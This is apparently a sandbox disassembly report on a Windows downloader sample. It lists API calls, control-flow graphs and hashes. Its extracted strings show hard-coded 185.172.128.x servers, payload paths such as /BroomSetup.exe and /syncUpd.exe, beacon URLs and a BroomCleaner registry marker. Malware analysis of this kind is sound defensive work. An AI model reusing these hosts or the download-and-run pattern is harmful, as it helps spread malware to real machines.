427712-427728 recv 611->614 614->482 617 42772e-42773b 614->617 617->614 618 42773d-42774f recv 617->618 618->482 619 427755-42775e 618->619 619->570
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00426771
                                                                                                                                                        • WSAStartup.WS2_32(00000202,?), ref: 004273FD
                                                                                                                                                        • socket.WS2_32(00000002,00000001,00000006), ref: 00427413
                                                                                                                                                        • WSACleanup.WS2_32 ref: 0042742D
                                                                                                                                                        • gethostbyname.WS2_32(00000000), ref: 00427441
                                                                                                                                                        • htons.WS2_32(?), ref: 00427473
                                                                                                                                                        • connect.WS2_32(00000000,?,00000010), ref: 00427484
                                                                                                                                                        • send.WS2_32(00000000,00000000,00000000,00000000), ref: 004274A7
                                                                                                                                                        • send.WS2_32(00000000,00000000,?,00000000), ref: 004274C3
                                                                                                                                                        • recv.WS2_32(00000000,00000000,00000001,00000000), ref: 00427503
                                                                                                                                                        • recv.WS2_32(?,00000000,00000001,00000000), ref: 00427681
                                                                                                                                                        • recv.WS2_32(?,?,00000000,00000000), ref: 00427720
                                                                                                                                                        • recv.WS2_32(?,0000000A,00000002,00000000), ref: 00427747
                                                                                                                                                        • recv.WS2_32(00000000,?,?,00000000), ref: 004277A8
                                                                                                                                                        • WSACleanup.WS2_32 ref: 004277E6
                                                                                                                                                        • closesocket.WS2_32(?), ref: 004277ED
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: recv$Cleanupsend$H_prologStartupclosesocketconnectgethostbynamehtonssocket
                                                                                                                                                        • String ID: HTTP/1.1$(KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36$/ping.php?substr=%s$185.172.128.228$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
                                                                                                                                                        • API String ID: 791229064-1542616328
                                                                                                                                                        • Opcode ID: f961f178ba84390bb4f0719f01a6f4fb8a549d420be4f1a9f2c07ca1afb26afe
                                                                                                                                                        • Instruction ID: 4e55451fc037eb126e07087a8435dc815b4e607a9865e0499e256671a6cdd487
                                                                                                                                                        • Opcode Fuzzy Hash: f961f178ba84390bb4f0719f01a6f4fb8a549d420be4f1a9f2c07ca1afb26afe
                                                                                                                                                        • Instruction Fuzzy Hash: F39287209062E19ACB02FFB56C5659E7FF4591530D714747FE690AF393CB2C86088B9E
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 620 424a0e-424b14 call 40a0c0 call 403491 call 40197c call 401b1e call 401a8d call 401a72 call 401a8d call 403498 call 401b52 call 401b1e call 4265bc call 401b1e GetModuleFileNameA call 401b1e call 42604a call 401a0c 651 424da5-424da7 620->651 652 424b1a 620->652 663 4252b7-42588c call 403491 * 15 call 40197c call 403491 * 19 call 40197c call 401b1e call 401a67 call 40356f call 401ae8 call 401b41 * 2 call 401adf call 401a67 call 401adf call 42676c call 40ff7e call 403491 * 14 call 40197c call 403491 * 15 call 40197c call 403491 * 12 call 40197c call 403491 * 13 call 40197c call 401b41 * 2 call 401adf * 2 call 42676c 651->663 664 424dad-425299 call 403491 * 35 call 40197c call 401b1e call 401a67 * 2 call 4034e3 call 401ae8 call 403491 * 14 call 40197c call 401b41 * 2 call 401adf call 401a67 call 401adf call 42676c call 40ff7e call 403491 * 21 call 40197c call 403491 * 9 call 40197c call 403491 call 40197c call 42615a 651->664 653 424b21-424b51 call 403491 * 3 652->653 654 424b56-424b86 call 403491 * 3 652->654 655 424d26-424d62 call 403491 * 4 652->655 656 424d64-424d8d call 403491 * 3 652->656 657 424c5a-424c8a call 403491 * 3 652->657 658 424b8b-424bd3 call 403491 * 5 652->658 659 424bd8-424c14 call 403491 * 4 652->659 660 424c19-424c55 call 403491 * 4 652->660 661 424c8f-424cd7 call 403491 * 5 652->661 662 424cdc-424d24 call 403491 * 5 652->662 739 424d94-424da0 call 40197c call 401adf 653->739 654->739 655->739 656->739 657->739 658->739 659->739 660->739 661->739 662->739 1166 425892-425910 call 40b740 call 403491 * 4 call 40197c call 426582 call 426242 663->1166 1167 425fc0-42601f call 4019f8 * 2 call 401ae8 call 401a11 call 401ae8 * 4 663->1167 1137 42529e-4252b2 call 4019f8 call 401ae8 664->1137 739->651 1137->663 1200 425912-425924 call 401b1e call 426510 1166->1200 1201 42592c-425b37 call 40ff7e call 403491 * 16 call 40197c call 403491 * 14 call 40197c call 401b41 * 2 call 401adf * 2 call 42676c 1166->1201 1208 425929 1200->1208 1282 425d0d-425d12 1201->1282 1283 425b3d-425c53 call 40b740 call 403491 * 4 call 40197c call 426582 call 40b740 call 426582 call 403491 * 8 call 40197c call 40b740 1201->1283 1208->1201 1284 425fb4-425fbb call 4019f8 1282->1284 1285 425d18-425f01 call 403491 * 15 call 40197c call 403491 * 15 call 40197c call 401b41 * 2 call 401adf * 2 call 42676c 1282->1285 1363 425c55-425c5a 1283->1363 1284->1167 1420 425f07-425f82 call 40b740 call 403491 * 4 call 40197c call 426582 call 426242 1285->1420 1421 425fab-425faf call 4019f8 1285->1421 1363->1363 1365 425c5c-425c65 1363->1365 1367 425c66-425c6c 1365->1367 1367->1367 1368 425c6e-425c7c 1367->1368 1370 425c7e-425c83 1368->1370 1370->1370 1372 425c85-425c8e 1370->1372 1374 425c8f-425c95 1372->1374 1374->1374 1377 425c97-425cbe call 426242 1374->1377 1383 425d00-425d07 call 40ff7e 1377->1383 1384 425cc0-425ce4 CreateDirectoryA call 42628b 1377->1384 1388 425d0c 1383->1388 1384->1383 1392 425ce6-425cf8 call 401b1e call 426510 1384->1392 1388->1282 1400 425cfd 1392->1400 1400->1383 1439 425f84-425f96 call 401b1e call 426510 1420->1439 1440 425f9e-425fa5 call 40ff7e 1420->1440 1421->1284 1446 425f9b 1439->1446 1444 425faa 1440->1444 1444->1421 1446->1440
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004265BC: __EH_prolog.LIBCMT ref: 004265C1
                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 00424AD4
                                                                                                                                                          • Part of subcall function 0042604A: __EH_prolog.LIBCMT ref: 0042604F
                                                                                                                                                          • Part of subcall function 0042604A: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
                                                                                                                                                        • String ID: .exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$eight$note.padd.cn.com$sub=([\w-]{1,255})
                                                                                                                                                        • API String ID: 2531350358-2497335110
                                                                                                                                                        • Opcode ID: 0bb659f992b5b48d51668391017d10ba5611e103180bdbbf6b23a0de6bfd33c2
                                                                                                                                                        • Instruction ID: d125a89a0ba1aec4cd60c53361ca74c042bcd3054cac0714d62587379a507679
                                                                                                                                                        • Opcode Fuzzy Hash: 0bb659f992b5b48d51668391017d10ba5611e103180bdbbf6b23a0de6bfd33c2
                                                                                                                                                        • Instruction Fuzzy Hash: EFB2131050A2E19AC712FB7958567CA2FE49B62309F54687FE7D01F2A3CB78460C87DE
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1707 42628b-4262cf call 427830 CoInitialize CoCreateInstance 1710 4262d1-4262d6 1707->1710 1711 4262ef-4262f1 1707->1711 1712 4262d7-4262ee call 40ddc6 1710->1712 1713 4262f4-4262f9 1711->1713 1713->1713 1715 4262fb-426321 MultiByteToWideChar SysAllocStringLen 1713->1715 1717 426324-426329 1715->1717 1717->1717 1718 42632b-42633c MultiByteToWideChar 1717->1718 1719 42633f-426344 1718->1719 1719->1719 1720 426346-426365 MultiByteToWideChar SysAllocStringLen 1719->1720 1721 426368-42636d 1720->1721 1721->1721 1722 42636f-4263a6 MultiByteToWideChar 1721->1722 1724 4263a8-4263b7 1722->1724 1725 4263bc-4263e8 1722->1725 1724->1712 1728 4263f0-4263fd 1725->1728 1729 4263ea-4263ee 1725->1729 1732 42640f-426422 1728->1732 1733 4263ff-42640d 1728->1733 1729->1724 1736 426457-4264d2 1732->1736 1737 426424-426450 call 40ddc6 1732->1737 1733->1729 1749 4264d6-4264f2 call 40ddc6 1736->1749 1737->1736
                                                                                                                                                        APIs
                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 004262AD
                                                                                                                                                        • CoCreateInstance.OLE32(00429220,00000000,00000001,00429210,?,?,?,?,?,?,?,?,?,?,?,/ping.php?substr=%s), ref: 004262C7
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00426309
                                                                                                                                                        • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426311
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 00426338
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 0042634E
                                                                                                                                                        • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426355
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 0042637A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$AllocString$CreateInitializeInstance
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3070066007-0
                                                                                                                                                        • Opcode ID: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
                                                                                                                                                        • Instruction ID: 83f5cca910cad30c2957a1169f386ac85e7f4b82ddc6b65933772462ec616701
                                                                                                                                                        • Opcode Fuzzy Hash: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
                                                                                                                                                        • Instruction Fuzzy Hash: 3A914B75A00218AFDB04DFA8D888AEEBBB9FF49314F544559F805EB241D776AC02CB64
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1846 4139e7-4139f3 call 4177fa 1849 413a15-413a21 call 413a6c ExitProcess 1846->1849 1850 4139f5-413a03 GetPEB 1846->1850 1850->1849 1851 413a05-413a0f GetCurrentProcess TerminateProcess 1850->1851 1851->1849
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00413A21
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                        • Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
                                                                                                                                                        • Instruction ID: 8e17948dea93fcc861bafccf52e4138581932e64e8d8508709b4de54f2ab24c4
                                                                                                                                                        • Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
                                                                                                                                                        • Instruction Fuzzy Hash: 83E0B631100108ABCF21AF65DD09A993B69EF54786F444029F9869A232DB39EE92CA48
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 04265BFE
                                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 04265C1E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972573005.0000000004265000.00000040.00000020.00020000.00000000.sdmp, Offset: 04265000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_4265000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                        • Instruction ID: fe2ff150ffcf860bdd503148628e16cec70f7c1bf99ba9151d6964acf43553ff
                                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                        • Instruction Fuzzy Hash: A1F06231210711BBE7203AB9A88DB6E76ECAF49625F140568E647954C0DA70F8C54A61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1447 41a242-41a272 call 419fa5 1450 41a274-41a27f call 41236e 1447->1450 1451 41a28d-41a299 call 41e6a7 1447->1451 1458 41a281-41a288 call 412381 1450->1458 1456 41a2b2-41a2fb call 419f10 1451->1456 1457 41a29b-41a2b0 call 41236e call 412381 1451->1457 1467 41a368-41a371 GetFileType 1456->1467 1468 41a2fd-41a306 1456->1468 1457->1458 1465 41a564-41a56a 1458->1465 1469 41a373-41a3a4 GetLastError call 41234b CloseHandle 1467->1469 1470 41a3ba-41a3bd 1467->1470 1472 41a308-41a30c 1468->1472 1473 41a33d-41a363 GetLastError call 41234b 1468->1473 1469->1458 1484 41a3aa-41a3b5 call 412381 1469->1484 1476 41a3c6-41a3cc 1470->1476 1477 41a3bf-41a3c4 1470->1477 1472->1473 1478 41a30e-41a33b call 419f10 1472->1478 1473->1458 1481 41a3d0-41a41e call 41e5f0 1476->1481 1482 41a3ce 1476->1482 1477->1481 1478->1467 1478->1473 1489 41a420-41a42c call 41a121 1481->1489 1490 41a42e-41a452 call 419cc3 1481->1490 1482->1481 1484->1458 1489->1490 1496 41a456-41a460 call 4163fd 1489->1496 1497 41a465-41a4a8 1490->1497 1498 41a454 1490->1498 1496->1465 1500 41a4c9-41a4d7 1497->1500 1501 41a4aa-41a4ae 1497->1501 1498->1496 1504 41a562 1500->1504 1505 41a4dd-41a4e1 1500->1505 1501->1500 1503 41a4b0-41a4c4 1501->1503 1503->1500 1504->1465 1505->1504 1506 41a4e3-41a516 CloseHandle call 419f10 1505->1506 1509 41a518-41a544 GetLastError call 41234b call 41e7b9 1506->1509 1510 41a54a-41a55e 1506->1510 1509->1510 1510->1504
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00419F10: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D
                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A356
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 0041A35D
                                                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 0041A369
                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A373
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 0041A37C
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041A39C
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0041A4E6
                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A518
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 0041A51F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                        • String ID: H
                                                                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                                                                        • Opcode ID: 693600e6575519d5232ec394ac030b5dd81d70dd39d7e28a8c319a74ab69f910
                                                                                                                                                        • Instruction ID: 6253cfc56dbab61e205766efb0611ca8061eb8c5ebbdbf8fd01913e42387971c
                                                                                                                                                        • Opcode Fuzzy Hash: 693600e6575519d5232ec394ac030b5dd81d70dd39d7e28a8c319a74ab69f910
                                                                                                                                                        • Instruction Fuzzy Hash: A4A13632A041089FDF199F78D8517EE7BA1AB06324F14019EEC15EB391D7398DA2C79A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1515 4192ad-4192bd 1516 4192d7-4192d9 1515->1516 1517 4192bf-4192d2 call 41236e call 412381 1515->1517 1518 419641-41964e call 41236e call 412381 1516->1518 1519 4192df-4192e5 1516->1519 1531 419659 1517->1531 1537 419654 call 410905 1518->1537 1519->1518 1523 4192eb-419316 1519->1523 1523->1518 1526 41931c-419325 1523->1526 1529 419327-41933a call 41236e call 412381 1526->1529 1530 41933f-419341 1526->1530 1529->1537 1534 419347-41934b 1530->1534 1535 41963d-41963f 1530->1535 1536 41965c-419661 1531->1536 1534->1535 1539 419351-419355 1534->1539 1535->1536 1537->1531 1539->1529 1542 419357-41936e 1539->1542 1543 419370-419373 1542->1543 1544 41938b-419394 1542->1544 1546 419375-41937b 1543->1546 1547 41937d-419386 1543->1547 1548 4193b2-4193bc 1544->1548 1549 419396-4193ad call 41236e call 412381 call 410905 1544->1549 1546->1547 1546->1549 1550 419427-419441 1547->1550 1552 4193c3-4193e1 call 417a45 call 41629a * 2 1548->1552 1553 4193be-4193c0 1548->1553 1580 419574 1549->1580 1555 419515-41951e call 4210f9 1550->1555 1556 419447-419457 1550->1556 1584 4193e3-4193f9 call 412381 call 41236e 1552->1584 1585 4193fe-419424 call 419800 1552->1585 1553->1552 1569 419591 1555->1569 1570 419520-419532 1555->1570 1556->1555 1560 41945d-41945f 1556->1560 1560->1555 1565 419465-41948b 1560->1565 1565->1555 1566 419491-4194a4 1565->1566 1566->1555 1571 4194a6-4194a8 1566->1571 1573 419595-4195ad ReadFile 1569->1573 1570->1569 1575 419534-419543 GetConsoleMode 1570->1575 1571->1555 1576 4194aa-4194d5 1571->1576 1578 419609-419614 GetLastError 1573->1578 1579 4195af-4195b5 1573->1579 1575->1569 1581 419545-419549 1575->1581 1576->1555 1583 4194d7-4194ea 1576->1583 1586 419616-419628 call 412381 call 41236e 1578->1586 1587 41962d-419630 1578->1587 1579->1578 1588 4195b7 1579->1588 1582 419577-419581 call 41629a 1580->1582 1581->1573 1589 41954b-419565 ReadConsoleW 1581->1589 1582->1536 1583->1555 1591 4194ec-4194ee 1583->1591 1584->1580 1585->1550 1586->1580 1598 419636-419638 1587->1598 1599 41956d-419573 call 41234b 1587->1599 1595 4195ba-4195cc 1588->1595 1596 419567 GetLastError 1589->1596 1597 419586-41958f 1589->1597 1591->1555 1601 4194f0-419510 1591->1601 1595->1582 1605 4195ce-4195d2 1595->1605 1596->1599 1597->1595 1598->1582 1599->1580 1601->1555 1610 4195d4-4195e4 call 418fc9 1605->1610 1611 4195eb-4195f6 1605->1611 1622 4195e7-4195e9 1610->1622 1612 419602-419607 call 418e09 1611->1612 1613 4195f8 call 419119 1611->1613 1620 4195fd-419600 1612->1620 1613->1620 1620->1622 1622->1582
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 7455f818b0db2fde8e31381446929043f5d461325fffdbb46aed0dcd817dfcea
                                                                                                                                                        • Instruction ID: c4abe014ee414803f6a4a6dca87339887fd42b2314c6943b79fa01ee0dc397dc
                                                                                                                                                        • Opcode Fuzzy Hash: 7455f818b0db2fde8e31381446929043f5d461325fffdbb46aed0dcd817dfcea
                                                                                                                                                        • Instruction Fuzzy Hash: 1CC13AB1E04249AFDB11CFA9C850BEE7BB1BF09314F04019AE954A7392C7389DC1CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1623 5cf003c-5cf0047 1624 5cf004c-5cf0263 call 5cf0a3f call 5cf0e0f call 5cf0d90 VirtualAlloc 1623->1624 1625 5cf0049 1623->1625 1640 5cf028b-5cf0292 1624->1640 1641 5cf0265-5cf0289 call 5cf0a69 1624->1641 1625->1624 1642 5cf02a1-5cf02b0 1640->1642 1645 5cf02ce-5cf03c2 VirtualProtect call 5cf0cce call 5cf0ce7 1641->1645 1642->1645 1646 5cf02b2-5cf02cc 1642->1646 1652 5cf03d1-5cf03e0 1645->1652 1646->1642 1653 5cf0439-5cf04b8 VirtualFree 1652->1653 1654 5cf03e2-5cf0437 call 5cf0ce7 1652->1654 1655 5cf04be-5cf04cd 1653->1655 1656 5cf05f4-5cf05fe 1653->1656 1654->1652 1658 5cf04d3-5cf04dd 1655->1658 1659 5cf077f-5cf0789 1656->1659 1660 5cf0604-5cf060d 1656->1660 1658->1656 1664 5cf04e3-5cf0505 LoadLibraryA 1658->1664 1662 5cf078b-5cf07a3 1659->1662 1663 5cf07a6-5cf07b0 1659->1663 1660->1659 1665 5cf0613-5cf0637 1660->1665 1662->1663 1667 5cf086e-5cf08be LoadLibraryA 1663->1667 1668 5cf07b6-5cf07cb 1663->1668 1669 5cf0517-5cf0520 1664->1669 1670 5cf0507-5cf0515 1664->1670 1671 5cf063e-5cf0648 1665->1671 1675 5cf08c7-5cf08f9 1667->1675 1672 5cf07d2-5cf07d5 1668->1672 1673 5cf0526-5cf0547 1669->1673 1670->1673 1671->1659 1674 5cf064e-5cf065a 1671->1674 1676 5cf07d7-5cf07e0 1672->1676 1677 5cf0824-5cf0833 1672->1677 1678 5cf054d-5cf0550 1673->1678 1674->1659 1679 5cf0660-5cf066a 1674->1679 1680 5cf08fb-5cf0901 1675->1680 1681 5cf0902-5cf091d 1675->1681 1682 5cf07e4-5cf0822 1676->1682 1683 5cf07e2 1676->1683 1687 5cf0839-5cf083c 1677->1687 1684 5cf0556-5cf056b 1678->1684 1685 5cf05e0-5cf05ef 1678->1685 1686 5cf067a-5cf0689 1679->1686 1680->1681 1682->1672 1683->1677 1688 5cf056f-5cf057a 1684->1688 1689 5cf056d 1684->1689 1685->1658 1690 5cf068f-5cf06b2 1686->1690 1691 5cf0750-5cf077a 1686->1691 1687->1667 1692 5cf083e-5cf0847 1687->1692 1694 5cf057c-5cf0599 1688->1694 1695 5cf059b-5cf05bb 1688->1695 1689->1685 1696 5cf06ef-5cf06fc 1690->1696 1697 5cf06b4-5cf06ed 1690->1697 1691->1671 1698 5cf084b-5cf086c 1692->1698 1699 5cf0849 1692->1699 1706 5cf05bd-5cf05db 1694->1706 1695->1706 1700 5cf06fe-5cf0748 1696->1700 1701 5cf074b 1696->1701 1697->1696 1698->1687 1699->1667 1700->1701 1701->1686 1706->1678
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 05CF024D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                        • String ID: cess$kernel32.dll
                                                                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                        • Instruction ID: 7aaab1ded95a448d04a3356cde5312a91b2331c78c5d5b65d20379a7378ade29
                                                                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                        • Instruction Fuzzy Hash: 7F525C74A01229DFDBA4CF58C984BACBBB1BF09314F1484D9E54EA7352DB30AA85DF14
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1753 42615a-426191 call 42780c RegCreateKeyExA 1756 426222-426226 1753->1756 1757 426197-4261aa 1753->1757 1758 426231-426241 1756->1758 1759 426228-42622b RegCloseKey 1756->1759 1760 4261ad-4261b2 1757->1760 1759->1758 1760->1760 1761 4261b4-4261d3 call 402c71 1760->1761 1764 4261d6-4261db 1761->1764 1764->1764 1765 4261dd-426215 call 402c71 RegSetValueExA call 402bef 1764->1765 1769 42621a-42621d call 402bef 1765->1769 1769->1756
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0042615F
                                                                                                                                                        • RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 00426187
                                                                                                                                                        • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 0042620A
                                                                                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042622B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseCreateH_prologValue
                                                                                                                                                        • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                        • API String ID: 1996196666-529226407
                                                                                                                                                        • Opcode ID: 9742427db463fe4f6bb28d71d590d7309dc6e65af80fb6a01f8e3694ad2225c2
                                                                                                                                                        • Instruction ID: 7631ba6f6479b49e2955b4a66f7b67ea7b8ea0f8d2650bf46820f955d15f7583
                                                                                                                                                        • Opcode Fuzzy Hash: 9742427db463fe4f6bb28d71d590d7309dc6e65af80fb6a01f8e3694ad2225c2
                                                                                                                                                        • Instruction Fuzzy Hash: F3319A71A00129EEDF149FA8DC94AFEBB78EB08348F44016EE80277281C7B11D05CB64
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
